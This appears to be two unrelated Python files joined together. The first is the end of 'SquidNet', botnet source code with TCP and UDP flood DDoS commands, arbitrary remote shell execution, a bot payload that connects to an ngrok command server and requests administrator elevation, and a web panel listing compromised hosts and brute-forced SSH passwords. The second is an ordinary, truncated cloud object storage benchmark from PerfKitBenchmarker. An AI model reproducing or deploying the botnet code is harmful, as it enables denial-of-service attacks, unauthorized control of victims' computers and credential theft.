self.fileeditor = True
self.send(f"File editing mode activated for file {self.filename}")
except:
self.send("File cannot be opened on this computer.".encode())
self.fileeditor = False
elif self.msg.startswith("!mkfile"):
msg_split = self.msg.split()
try:
filename = msg_split[1]
file = open(str(filename), "w")
file.close()
self.send(f"File {filename} has been created in {os.getcwd()}".encode())
except:
self.send("Error with creating files.".encode())
elif self.msg.startswith("!rickroll"):
if sys.platform == "win32":
for i in range(10):
os.system("start https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO")
else:
for i in range(10):
os.system("open https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO")
self.send("Just got rick rolled!".encode())
elif self.msg.startswith("!tcpflood"):
msg_split = self.msg.split()
ip = msg_split[1]
try:
port = int(msg_split[2])
except:
port = 80
try:
delay = float(msg_split[3])
except:
delay = 0
try:
pkt_size = int(msg_split[4])
except:
pkt_size = 1024
self.tcpflood = TCP_UDP_Flood(ip, port, delay, pkt_size)
self.tcp_flood = threading.Thread(target=self.tcpflood.TCP_Flood)
self.tcp_flood.start()
elif self.msg.startswith("!udpflood"):
msg_split = self.msg.split()
ip = msg_split[1]
try:
port = int(msg_split[2])
except:
port = 80
try:
delay = float(msg_split[3])
except:
delay = 0
try:
pkt_size = int(msg_split[4])
except:
pkt_size = 1024
self.udpflood = TCP_UDP_Flood(ip, port, delay, pkt_size)
self.udp_flood = threading.Thread(target=self.udpflood.UDP_Flood)
self.udp_flood.start()
else:
cmd = subprocess.Popen(self.msg, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout = cmd.stdout.read()+cmd.stderr.read()
self.send(stdout)
except Exception as e:
self.send(f"Error in script: {e}".encode())
ip = '""" + self.ngroklink + """'
port = """ + str(self.ngrokport) + """
key = """ + str(self.key) + """
if sys.platform == "win32":
try:
isadmin = ctypes.windll.shell32.IsUserAnAdmin()
except:
isadmin = False
if isadmin:
bot = Bot(ip, port, key)
else:
exec_dir = sys.argv[0]
params = f'"{exec_dir}"'
try:
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, params, None, 1)
except:
bot = Bot(ip, port, key)
else:
bot = Bot(ip, port, key)
#-----End-Of-Bot-----#
"""
return script
class Web_Interface:
"""Web Interface for seeing connections, some general info about them, and also
info about this script. There are some important info about some of the important
variables in the server, so that the User can learn more about it."""
def __init__(self, ip, port):
"""Initiation of the web-server, also where all the important variables are defined,
as well as the starting of the server and threads."""
self.ip = "localhost"
self.port = port
self.working = False
try:
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((ip, port))
self.working = True
except Exception as e:
print(f"\n[+] Web-Interface is unable to start due to error: {e}")
if self.working:
self.packet = ""
self.listener = threading.Thread(target=self.listen)
self.listener.start()
self.packets = threading.Thread(target=self.packetmaker)
self.packets.start()
def packetmaker(self):
"""This function generates the packet to send
to the client and also for updating the Web-Interface."""
while True:
try:
conn_bots = ""
for x in botnet.botnet.info:
conn_bots += '<tr>\n<td>' + x.split()[0] + '</td>\n<td>' + x.split()[1] + "</td>\n<td>" + x.split()[
2] + "</td>\n<td>" + x.split()[3] + "</td>\n<td>" + x.split()[4] + "</td>\n</tr>\n"
conn_admin = ""
for x in botnet.botnet.admininfo:
conn_admin += '<tr>\n<td>' + x.split()[0] + '</td>\n<td>' + x.split()[1] + "</td>\n<td>" + \
x.split()[
2] + "</td>\n<td>" + x.split()[3] + "</td>\n<td>" + x.split()[
4] + "</td>\n</tr>\n"
conn_ssh = ""
for x in botnet.botnet.ssh_info:
conn_ssh += '<tr>\n<td>' + x.split()[0] + '</td>\n<td>' + x.split()[1] + "</td>\n<td>" + x.split()[
2] + "</td>\n</tr>\n"
self.packet = """
<!DOCTYPE html>
<html lang="en">
<meta charset="UTF-8">
<title>SquidNet Web-Interface</title>
<head>
<style>
table {
border: 3px solid black;
font-size: 50px
border-collapse: collapse;
font: arial;
}
td, th {
border: 1px solid black;
padding: 5px;
}
</style>
</head>
<body>
<h1>SquidNet Web Interface<h1>
<h3>(Clearly HTML is not my base language so it doesn't look too good)<h3>
<h1>Connections To the Botnet<h1>
<table>
<thead>
<tr>
<th>Hostname</th>
<th>IP Address</th>
<th>UserName</th>
<th>Connection</th>
<th>OS</th>
</tr>
</thead>
<tbody>
""" + str(conn_bots) + """
</tbody>
</table>
<h1>Admin Connections To the Botnet<h1>
<table>
<thead>
<tr>
<th>Hostname</th>
<th>IP Address</th>
<th>UserName</th>
<th>Connection</th>
<th>OS</th>
</tr>
</thead>
<tbody>
""" + str(conn_admin) + """
</tbody>
</table>
<h1>SSH Connections to the Botnet</h1>
<table>
<thead>
<tr>
<th>Hostname</th>
<th>IP Address</th>
<th>Password</th>
</tr>
</thead>
<tbody>
""" + str(conn_ssh) + """
</tbody>
</table>
<h2>About:</h2>
</h4>Squidnet is an SSH and TCP Botnet Hybrid. The Botnet has the ability to take control of computers compromised by the
bot script, as well as gaining access to ssh servers. It also has a form of security in which admins need to provide a username and
a password in order to gain access. They will be kicked if they do not enter the correct credentials. The Bots can do many
things including DDoS Attacks(HTTP, TCP and UDP Floods), sending their passwords to the Botnet, editing files remotely,
and many more.</h4>
<h2>Important Info</h2>
<h4>Server Log file: """ + os.getcwd() + """\\servlog.txt - Good for checking for errors and server output.</h4>
<h4>Server IP: """ + str(botnet.botnet.ngroklink) + """:""" + str(botnet.botnet.ngrokport) + """ - How Bots will connect to the Botnet.</h4>
<h4>Admin Username: """ + str(botnet.botnet.admin_name) + """ - Username Used by Admins to obtain access to the Botnet</h4>
<h4>Admin Password: """ + str(botnet.botnet.passw) + """ - Password Used by Admins to obtain access to the Botnet.</h4>
<h4>Encryption Token: """ + str(botnet.botnet.key) + """ - Used for encrypting files on the bots.</h4>
<h4>Brute-Forcing-File: """ + str(botnet.botnet.passfilename) + """ - Used for SSH-Brute-Forcing.</h4>
</body>
</html>
"""
time.sleep(1)
except:
pass
def listen(self):
"""Listens for and accepts connections."""
while True:
self.server.listen()
conn, ip = self.server.accept()
handler = threading.Thread(target=self.handler, args=(conn,))
handler.start()
def handler(self, conn):
"""Handles the connections and sends the HTTP Code to the client
to view the Web Interface."""
conn.send('HTTP/1.0 200 OK\n'.encode())
conn.send('Content-Type: text/html\n'.encode())
conn.send('\n'.encode())
conn.send(self.packet.encode())
if sys.platform == "win32":
pass
else:
conn.close()
if __name__ == '__main__':
"""Clears CMD Output."""
if sys.platform == "win32":
os.system("cls")
else:
os.system("clear")
try:
"""Tries to import this module."""
import paramiko
except:
"""Since paramiko is not an official Python Module,
the user may need to download Paramiko themself."""
print(Botnet.log_logo())
print("\n[+] Missing Module: Paramiko\n[+] If you have python 3 installed, try: pip install paramiko")
sys.exit()
botnet = ArguementParse()
|
object_storage_service_benchmark.py
|
# Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Object (blob) Storage benchmark tests.
There are two categories of tests here: 1) tests based on CLI tools, and 2)
tests that use APIs to access storage provider.
For 1), we aim to simulate one typical use case of common user using storage
provider: upload and downloads a set of files with different sizes from/to a
local directory.
For 2), we aim to measure more directly the performance of a storage provider
by accessing them via APIs. Here are the main scenarios covered in this
category:
a: Single byte object upload and download, measures latency.
b: List-after-write and list-after-update consistency measurement.
c: Single stream large object upload and download, measures throughput.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import enum
import glob
import json
import logging
import os
import posixpath
import re
import threading
import time
import uuid
from absl import flags
import numpy as np
from perfkitbenchmarker import configs
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flag_util
from perfkitbenchmarker import object_storage_service
from perfkitbenchmarker import providers
from perfkitbenchmarker import sample
from perfkitbenchmarker import units
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.gcp import gcs
from perfkitbenchmarker.sample import PercentileCalculator # noqa
import six
from six.moves import range
from six.moves import zip
flags.DEFINE_enum('storage', providers.GCP,
[providers.GCP, providers.AWS,
providers.AZURE, providers.OPENSTACK],
'storage provider (GCP/AZURE/AWS/OPENSTACK) to use.')
flags.DEFINE_string('object_storage_region', None,
'Storage region for object storage benchmark.')
flags.DEFINE_string('object_storage_gcs_multiregion', None,
'Storage multiregion for GCS in object storage benchmark.')
flags.DEFINE_string('object_storage_storage_class', None,
'Storage class to use in object storage benchmark.')
flags.DEFINE_enum('object_storage_scenario', 'all',
['all', 'cli', 'api_data', 'api_namespace',
'api_multistream', 'api_multistream_writes',
'api_multistream_reads'],
'select all, or one particular scenario to run: \n'
'ALL: runs all scenarios. This is the default. \n'
'cli: runs the command line only scenario. \n'
'api_data: runs API based benchmarking for data paths. \n'
'api_namespace: runs API based benchmarking for namespace '
'operations. \n'
'api_multistream: runs API-based benchmarking with multiple '
'upload/download streams.\n'
'api_multistream_writes: runs API-based benchmarking with '
'multiple upload streams.')
flags.DEFINE_string('object_storage_bucket_name', None,
'If set, the bucket will be created with this name')
flags.DEFINE_boolean('object_storage_apply_region_suffix_to_bucket_name', False,
'If set, the region will be appended to the bucket name.')
flags.DEFINE_enum('cli_test_size', 'normal',
['normal', 'large'],
'size of the cli tests. Normal means a mixture of various \n'
'object sizes up to 32MiB (see '
'data/cloud-storage-workload.sh). \n'
'Large means all objects are of at least 1GiB.')
flags.DEFINE_integer('object_storage_multistream_objects_per_stream', 1000,
'Number of objects to send and/or receive per stream. '
'Only applies to the api_multistream scenario.',
lower_bound=1)
flag_util.DEFINE_yaml('object_storage_object_sizes', '1KB',
'Size of objects to send and/or receive. Only applies to '
'the api_multistream scenario. Examples: 1KB, '
'{1KB: 50%, 10KB: 50%}')
flags.DEFINE_integer('object_storage_streams_per_vm', 10,
'Number of independent streams per VM. Only applies to '
'the api_multistream scenario.',
lower_bound=1)
flags.DEFINE_integer('object_storage_list_consistency_iterations', 200,
'Number of iterations to perform for the api_namespace '
'list consistency benchmark. This flag is mainly for '
'regression testing in the benchmarks. Reduce the number '
'to shorten the execution time of the api_namespace '
'scenario. However, to get useful metrics from the '
'api_namespace scenario, a high number of iterations '
'should be used (>=200).')
flags.DEFINE_enum('object_storage_object_naming_scheme', 'sequential_by_stream',
['sequential_by_stream',
'approximately_sequential'],
'How objects will be named. Only applies to the '
'api_multistream benchmark. '
'sequential_by_stream: object names from each stream '
'will be sequential, but different streams will have '
'different name prefixes. '
'approximately_sequential: object names from all '
'streams will roughly increase together.')
flags.DEFINE_string('object_storage_objects_written_file_prefix', None,
'If specified, the bucket and all of the objects will not '
'be deleted, and the list of object names will be written '
'to a file with the specified prefix in the following '
'format: <bucket>/<object>. This prefix can be passed to '
'this benchmark in a later run via via the '
'object_storage_read_objects_prefix flag. Only valid for '
'the api_multistream and api_multistream_writes scenarios. '
'The filename is appended with the date and time so that '
'later runs can be given a prefix and a minimum age of '
'objects. The later run will then use the oldest objects '
'available or fail if there is no file with an old enough '
'date. The prefix is also appended with the region so that '
'later runs will read objects from the same region.')
flags.DEFINE_string('object_storage_read_objects_prefix', None,
'If specified, no new bucket or objects will be created. '
'Instead, the benchmark will read the objects listed in '
'a file with the specified prefix that was written some '
'number of hours before (as specifed by '
'object_storage_read_objects_min_hours). Only valid for '
'the api_multistream_reads scenario.')
flags.DEFINE_integer('object_storage_read_objects_min_hours', 72, 'The minimum '
'number of hours from which to read objects that were '
'written on a previous run. Used in combination with '
'object_storage_read_objects_prefix.')
flags.DEFINE_boolean('object_storage_dont_delete_bucket', False,
'If True, the storage bucket won\'t be deleted. Useful '
'for running the api_multistream_reads scenario multiple '
'times against the same objects.')
flags.DEFINE_string('object_storage_worker_output', None,
'If set, the worker threads\' output will be written to the'
'path provided.')
flags.DEFINE_float('object_storage_latency_histogram_interval', None,
'If set, a latency histogram sample will be created with '
'buckets of the specified interval in seconds. Individual '
'histogram samples are created for each different object '
'size in the distribution, because it is easy to aggregate '
'the histograms during post-processing, but impossible to '
'go in the opposite direction.')
flags.DEFINE_boolean(
'record_individual_latency_samples', False,
'If set, record the latency of each download and upload '
'in its own sample.')
flags.DEFINE_boolean(
'object_storage_bulk_delete', False,
'If true, deletes objects with bulk delete client request and records '
'average latency per object. Otherwise, deletes one object per request '
'and records individual delete latency'
)
FLAGS = flags.FLAGS
BENCHMARK_INFO = {'name': 'object_storage_service',
'description':
'Object/blob storage service benchmarks. Specify '
'--object_storage_scenario '
'to select a set of sub-benchmarks to run. default is all.',
'scratch_disk': False,
'num_machines': 1}
BENCHMARK_NAME = 'object_storage_service'
BENCHMARK_CONFIG = """
object_storage_service:
description: >
Object/blob storage service benchmarks. Specify
--object_storage_scenario
to select a set of sub-benchmarks to run. default is all.
vm_groups:
default:
vm_spec: *default_single_core
vm_count: null
flags:
gcloud_scopes: https://www.googleapis.com/auth/devstorage.read_write
"""
DATA_FILE = 'cloud-storage-workload.sh'
# size of all data used in the CLI tests.
DATA_SIZE_IN_BYTES = 256.1 * 1024 * 1024
DATA_SIZE_IN_MBITS = 8 * DATA_SIZE_IN_BYTES / 1000 / 1000
LARGE_DATA_SIZE_IN_BYTES = 3 * 1024 * 1024 * 1024
LARGE_DATA_SIZE_IN_MBITS = 8 * LARGE_DATA_SIZE_IN_BYTES / 1000 / 1000
API_TEST_SCRIPT = 'object_storage_api_tests.py'
API_TEST_SCRIPTS_DIR = 'object_storage_api_test_scripts'
# Files that will be sent to the remote VM as a package for API test script.
API_TEST_SCRIPT_PACKAGE_FILES = [
'__init__.py', 'object_storage_interface.py', 'azure_flags.py',
'gcs_flags.py', 's3_flags.py'
]
SCRIPT_DIR = '/tmp/run'
REMOTE_PACKAGE_DIR = posixpath.join(SCRIPT_DIR, 'providers')
DOWNLOAD_DIRECTORY = posixpath.join(SCRIPT_DIR, 'temp')
# Various constants to name the result metrics.
THROUGHPUT_UNIT = 'Mbps'
LATENCY_UNIT = 'seconds'
NA_UNIT = 'na'
PERCENTILES_LIST = ['p0.1', 'p1', 'p5', 'p10', 'p50', 'p90', 'p95', 'p99',
'p99.9', 'average', 'stddev']
UPLOAD_THROUGHPUT_VIA_CLI = 'upload throughput via cli Mbps'
DOWNLOAD_THROUGHPUT_VIA_CLI = 'download throughput via cli Mbps'
CLI_TEST_ITERATION_COUNT = 10
LARGE_CLI_TEST_ITERATION_COUNT = 20
CLI_TEST_FAILURE_TOLERANCE = 0.05
# Azure does not parallelize operations in its CLI tools. We have to
# do the uploads or downloads of 100 test files sequentially, it takes
# a very long time for each iteration, so we are doing only 3 iterations.
CLI_TEST_ITERATION_COUNT_AZURE = 3
SINGLE_STREAM_THROUGHPUT = 'single stream %s throughput Mbps'
ONE_BYTE_LATENCY = 'one byte %s latency'
LIST_CONSISTENCY_SCENARIOS = ['list-after-write', 'list-after-update']
LIST_CONSISTENCY_PERCENTAGE = 'consistency percentage'
LIST_INCONSISTENCY_WINDOW = 'inconsistency window'
LIST_LATENCY = 'latency'
CONTENT_REMOVAL_RETRY_LIMIT = 5
# Some times even when a bucket is completely empty, the service provider would
# refuse to remove the bucket with "BucketNotEmpty" error until up to 1 hour
# later. We keep trying until we reach the one-hour limit. And this wait is
# necessary for some providers.
BUCKET_REMOVAL_RETRY_LIMIT = 120
RETRY_WAIT_INTERVAL_SECONDS = 30
# GCS has special region handling until we can remove it :(
DEFAULT_GCS_MULTIREGION = 'us'
# Keys for flag names and metadata values
OBJECT_STORAGE_REGION = 'object_storage_region'
REGIONAL_BUCKET_LOCATION = 'regional_bucket_location'
OBJECT_STORAGE_GCS_MULTIREGION = 'object_storage_gcs_multiregion'
GCS_MULTIREGION_LOCATION = 'gcs_multiregion_location'
DEFAULT = 'default'
# This accounts for the overhead of running RemoteCommand() on a VM.
MULTISTREAM_DELAY_PER_VM = 5.0 * units.second
# We wait this long for each stream. Note that this is multiplied by
# the number of streams per VM, not the total number of streams.
MULTISTREAM_DELAY_PER_STREAM = 0.1 * units.second
# And add a constant factor for PKB-side processing
MULTISTREAM_DELAY_CONSTANT = 10.0 * units.second
# Max number of delete operations per second
MULTISTREAM_DELETE_OPS_PER_SEC = 3500
# The multistream write benchmark writes a file in the VM's /tmp with
# the objects it has written, which is used by the multistream read
# benchmark. This is the filename.
OBJECTS_WRITTEN_FILE = 'pkb-objects-written'
# If the gap between different stream starts and ends is above a
# certain proportion of the total time, we log a warning because we
# are throwing out a lot of information. We also put the warning in
# the sample metadata.
MULTISTREAM_STREAM_GAP_THRESHOLD = 0.2
# The API test script uses different names for providers than this
# script :(
STORAGE_TO_API_SCRIPT_DICT = {
providers.GCP: 'GCS',
providers.AWS: 'S3',
providers.AZURE: 'AZURE'}
_SECONDS_PER_HOUR = 60 * 60
class MultistreamOperationType(enum.Enum):
"""MultiStream Operations supported by object_storage_api_tests script."""
download = 1
upload = 2
delete = 3
bulk_delete = 4
def GetConfig(user_config):
return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
# Raised when we fail to remove a bucket or its content after many retries.
# TODO: add a new class of error "ObjectStorageError" to errors.py and remove
# this one.
class BucketRemovalError(Exception):
pass
class NotEnoughResultsError(Exception):
pass
class ColdDataError(Exception):
"""Exception indicating that the cold object data does not exist."""
def _JsonStringToPercentileResults(results, json_input, metric_name,
metric_unit, metadata):
"""This function parses a percentile result string in Json format.
Args:
results: The final result set to put result in.
json_input: The input in Json format about percentiles.
metric_name: Name of the metric.
metric_unit: Unit of the metric.
metadata: The metadata to be included.
"""
result = json.loads(json_input)
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (metric_name, percentile),
float(result[percentile]),
metric_unit,
metadata))
def _GetClientLibVersion(vm, library_name):
"""This function returns the version of client lib installed on a vm.
Args:
vm: the VM to get the client lib version from.
library_name: the name of the client lib.
Returns:
The version string of the client.
"""
version, _ = vm.RemoteCommand('pip3 show %s |grep Version' % library_name)
logging.info('%s client lib version is: %s', library_name, version)
return version
def MultiThreadStartDelay(num_vms, threads_per_vm):
"""Find how long in the future we can simultaneously start threads on VMs.
Args:
num_vms: number of VMs to start threads on.
threads_per_vm: number of threads to start on each VM.
Returns:
A units.Quantity of time such that if we want to start
threads_per_vm threads on num_vms VMs, we can start the threads
sequentially, tell each of them to sleep for this number of
seconds, and we expect that we will be able to start the last
thread before the delay has finished.
"""
return (
MULTISTREAM_DELAY_CONSTANT +
MULTISTREAM_DELAY_PER_VM * num_vms +
MULTISTREAM_DELAY_PER_STREAM * threads_per_vm)
def MultiThreadDeleteDelay(num_vms, threads_per_vm):
"""Calculates delay time between delete operation.
Args:
num_vms: number of VMs to start threads on.
threads_per_vm: number of threads to start on each VM.
Returns:
float. Delay time in seconds based on number of vms and threads and the
maximum number of delete operations per second.
"""
return (num_vms * threads_per_vm) / (MULTISTREAM_DELETE_OPS_PER_SEC)
def _ProcessMultiStreamResults(start_times, latencies, sizes, operation,
all_sizes, results, metadata=None):
"""Read and process results from the api_multistream worker process.
Results will be reported per-object size and combined for all
objects.
Args:
start_times: a list of numpy arrays. Operation start times, as
POSIX timestamps.
latencies: a list of numpy arrays. Operation durations, in seconds.
sizes: a list of numpy arrays. Object sizes used in each
operation, in bytes.
operation: 'upload' or 'download'. The operation the results are from.
all_sizes: a sequence of integers. all object sizes in the
distribution used, in bytes.
results: a list to append Sample objects to.
metadata: dict. Base sample metadata
"""
num_streams = FLAGS.object_storage_streams_per_vm * FLAGS.num_vms
assert len(start_times) == num_streams
assert len(latencies) == num_streams
assert len(sizes) == num_streams
if metadata is None:
metadata = {}
metadata['num_streams'] = num_streams
metadata['objects_per_stream'] = (
FLAGS.object_storage_multistream_objects_per_stream)
metadata['object_naming'] = FLAGS.object_storage_object_naming_scheme
min_num_records = min((len(start_time) for start_time in start_times))
num_records = sum((len(start_time) for start_time in start_times))
logging.info('Processing %s total operation records', num_records)
stop_times = [start_time + latency
for start_time, latency in zip(start_times, latencies)]
last_start_time = max((start_time[0] for start_time in start_times))
first_stop_time = min((stop_time[-1] for stop_time in stop_times))
# Compute how well our synchronization worked
first_start_time = min((start_time[0] for start_time in start_times))
last_stop_time = max((stop_time[-1] for stop_time in stop_times))
start_gap = last_start_time - first_start_time
stop_gap = last_stop_time - first_stop_time
if ((start_gap + stop_gap) / (last_stop_time - first_start_time) <
MULTISTREAM_STREAM_GAP_THRESHOLD):
logging.info(
'First stream started %s seconds before last stream started', start_gap)
logging.info(
'Last stream ended %s seconds after first stream ended', stop_gap)
else:
logging.warning(
'Difference between first and last stream start/end times was %s and '
'%s, which is more than %s of the benchmark time %s.',
start_gap, stop_gap, MULTISTREAM_STREAM_GAP_THRESHOLD,
(last_stop_time - first_start_time))
metadata['stream_gap_above_threshold'] = True
# Find the indexes in each stream where all streams are active,
# following Python's [inclusive, exclusive) index convention.
active_start_indexes = np.full(num_streams, 0)
for index, start_time in enumerate(start_times):
for i in range(len(start_time)):
if start_time[i] >= last_start_time:
active_start_indexes[index] = i
break
active_stop_indexes = np.full(num_streams, min_num_records)
for index, stop_time in enumerate(stop_times):
for i in range(len(stop_time) - 1, -1, -1):
if stop_time[i] <= first_stop_time:
active_stop_indexes[index] = i + 1
break
active_latencies = [
latencies[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
active_sizes = [
sizes[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
all_active_latencies = np.concatenate(active_latencies)
all_active_sizes = np.concatenate(active_sizes)
# Don't publish the full distribution in the metadata because doing
# so might break regexp-based parsers that assume that all metadata
# values are simple Python objects. However, do add an
# 'object_size_B' metadata field even for the full results because
# searching metadata is easier when all records with the same metric
# name have the same set of metadata fields.
distribution_metadata = metadata.copy()
if len(all_sizes) == 1:
distribution_metadata['object_size_B'] = all_sizes[0]
else:
distribution_metadata['object_size_B'] = 'distribution'
latency_prefix = 'Multi-stream %s latency' % operation
logging.info('Processing %s multi-stream %s results for the full '
'distribution.', len(all_active_latencies), operation)
_AppendPercentilesToResults(
results,
all_active_latencies,
latency_prefix,
LATENCY_UNIT,
distribution_metadata)
# Publish by-size and full-distribution stats even if there's only
# one size in the distribution, because it simplifies postprocessing
# of results.
for size in all_sizes:
this_size_metadata = metadata.copy()
this_size_metadata['object_size_B'] = size
logging.info('Processing multi-stream %s results for object size %s',
operation, size)
_AppendPercentilesToResults(
results,
all_active_latencies[all_active_sizes == size],
latency_prefix,
LATENCY_UNIT,
this_size_metadata)
# Record samples for individual downloads and uploads if requested.
if FLAGS.record_individual_latency_samples:
for latency in all_active_latencies[all_active_sizes == size]:
results.append(
sample.Sample('%s individual' % latency_prefix, latency,
LATENCY_UNIT, this_size_metadata))
# Build the object latency histogram if user requested it
if FLAGS.object_storage_latency_histogram_interval and any(
size in x for x in sizes):
histogram_interval = FLAGS.object_storage_latency_histogram_interval
hist_latencies = [[l for l, s in zip(*w_l_s) if s == size]
for w_l_s in zip(latencies, sizes)]
max_latency = max([max(l) for l in hist_latencies])
# Note that int() floors for us
num_histogram_buckets = int(max_latency / histogram_interval) + 1
histogram_buckets = [0 for _ in range(num_histogram_buckets)]
for worker_latencies in hist_latencies:
for latency in worker_latencies:
# Note that int() floors for us
histogram_buckets[int(latency / histogram_interval)] += 1
histogram_str = ','.join([str(c) for c in histogram_buckets])
histogram_metadata = this_size_metadata.copy()
histogram_metadata['interval'] = histogram_interval
histogram_metadata['histogram'] = histogram_str
results.append(sample.Sample(
'Multi-stream %s latency histogram' % operation,
0.0, 'histogram', metadata=histogram_metadata))
# Throughput metrics
total_active_times = [np.sum(latency) for latency in active_latencies]
active_durations = [stop_times[i][active_stop_indexes[i] - 1] -
start_times[i][active_start_indexes[i]]
for i in range(num_streams)]
total_active_sizes = [np.sum(size) for size in active_sizes]
# 'net throughput (with gap)' is computed by taking the throughput
# for each stream (total # of bytes transmitted / (stop_time -
# start_time)) and then adding the per-stream throughputs. 'net
# throughput' is the same, but replacing (stop_time - start_time)
# with the sum of all of the operation latencies for that thread, so
# we only divide by the time that stream was actually transmitting.
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput',
np.sum((size / active_time * 8
for size, active_time
in zip(total_active_sizes, total_active_times))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (with gap)',
np.sum((size / duration * 8
for size, duration in zip(total_active_sizes, active_durations))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (simplified)',
sum([np.sum(size) for size in sizes]) /
(last_stop_time - first_start_time) * 8,
'bit / second', metadata=distribution_metadata))
# QPS metrics
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (any stream active)',
num_records / (last_stop_time - first_start_time), 'operation / second',
metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (all streams active)',
len(all_active_latencies) / (first_stop_time - last_start_time),
'operation / second', metadata=distribution_metadata))
# Statistics about benchmarking overhead
gap_time = sum((active_duration - active_time
for active_duration, active_time
in zip(active_durations, total_active_times)))
results.append(sample.Sample(
'Multi-stream ' + operation + ' total gap time',
gap_time, 'second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' gap time proportion',
gap_time / (first_stop_time - last_start_time) * 100.0,
'percent', metadata=distribution_metadata))
def _DistributionToBackendFormat(dist):
"""Convert an object size distribution to the format needed by the backend.
Args:
dist: a distribution, given as a dictionary mapping size to
frequency. Size will be a string with a quantity and a
unit. Frequency will be a percentage, including a '%'
character. dist may also be a string, in which case it represents
a single object size which applies to 100% of objects.
Returns:
A dictionary giving an object size distribution. Sizes will be
integers representing bytes. Frequencies will be floating-point
numbers in [0,100], representing percentages.
Raises:
ValueError if dist is not a valid distribution.
"""
if isinstance(dist, dict):
val = {flag_util.StringToBytes(size):
flag_util.StringToRawPercent(frequency)
for size, frequency in six.iteritems(dist)}
else:
# We allow compact notation for point distributions. For instance,
# '1KB' is an abbreviation for '{1KB: 100%}'.
val = {flag_util.StringToBytes(dist): 100.0}
# I'm requiring exact addition to 100, which can always be satisfied
# with integer percentages. If we want to allow general decimal
# percentages, all we have to do is replace this equality check with
# approximate equality.
if sum(six.itervalues(val)) != 100.0:
raise ValueError("Frequencies in %s don't add to 100%%!" % dist)
return val
class APIScriptCommandBuilder(object):
"""Builds command lines for the API test script.
Attributes:
test_script_path: the path to the API test script on the remote machine.
storage: the storage provider to use, in the format expected by
the test script.
service: the ObjectStorageService object corresponding to the
storage provider.
"""
def __init__(self, test_script_path, storage, service):
self.test_script_path = test_script_path
self.storage = storage
self.service = service
def BuildCommand(self, args):
"""Build a command string for the API test script.
Args:
args: a list of strings. These will become space-separated
arguments to the test script.
Returns:
A string that can be passed to vm.RemoteCommand.
"""
cmd_parts = [
self.test_script_path,
'--storage_provider=%s' % self.storage
] + args + self.service.APIScriptArgs()
if FLAGS.object_storage_storage_class is not None:
cmd_parts += ['--object_storage_class',
FLAGS.object_storage_storage_class]
return ' '.join(cmd_parts)
class UnsupportedProviderCommandBuilder(APIScriptCommandBuilder):
"""A dummy command builder for unsupported providers.
When a provider isn't supported by the API test script yet, we
create this command builder for them. It will let us run the CLI
benchmark on that provider, but if the user tries to run an API
benchmark, it will throw an error.
Attributes:
provider: the name of the unsupported provider.
"""
def __init__(self, provider):
self.provider = provider
def BuildCommand(self, args):
raise NotImplementedError('API tests are not supported on provider %s.' %
self.provider)
def OneByteRWBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for small object latency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
one_byte_rw_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=OneByteRW'])
_, raw_result = vm.RemoteCommand(one_byte_rw_cmd)
logging.info('OneByteRW raw result is %s', raw_result)
for up_and_down in ([
MultistreamOperationType.upload, MultistreamOperationType.download
]):
search_string = 'One byte %s - (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = ONE_BYTE_LATENCY % up_and_down
if len(result_string) > 0:
_JsonStringToPercentileResults(results,
result_string[0],
sample_name,
LATENCY_UNIT,
metadata)
else:
raise ValueError('Unexpected test outcome from OneByteRW api test: '
'%s.' % raw_result)
def SingleStreamThroughputBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for large object throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
single_stream_throughput_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=SingleStreamThroughput'])
_, raw_result = vm.RemoteCommand(single_stream_throughput_cmd)
logging.info('SingleStreamThroughput raw result is %s', raw_result)
for up_and_down in [
MultistreamOperationType.upload, MultistreamOperationType.download
]:
search_string = 'Single stream %s throughput in Bps: (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = SINGLE_STREAM_THROUGHPUT % up_and_down
if not result_string:
raise ValueError('Unexpected test outcome from '
'SingleStreamThroughput api test: %s.' % raw_result)
# Convert Bytes per second to Mega bits per second
# We use MB (10^6) to be consistent with network
# bandwidth convention.
